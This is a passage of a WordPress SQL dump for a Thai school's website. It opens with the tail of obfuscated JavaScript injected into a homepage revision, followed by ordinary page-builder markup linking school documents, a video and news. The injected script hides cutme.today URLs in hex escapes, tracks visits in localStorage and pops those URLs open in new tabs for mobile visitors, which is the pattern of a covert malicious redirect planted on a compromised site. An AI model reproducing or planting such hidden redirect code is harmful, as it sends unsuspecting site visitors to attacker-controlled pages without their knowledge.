_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 12:27:37','2024-08-28 05:27:37','',19,'http://watprato.ssk.in.th/?p=247',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(248,2,'2024-08-28 13:55:25','2024-08-28 06:55:25','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 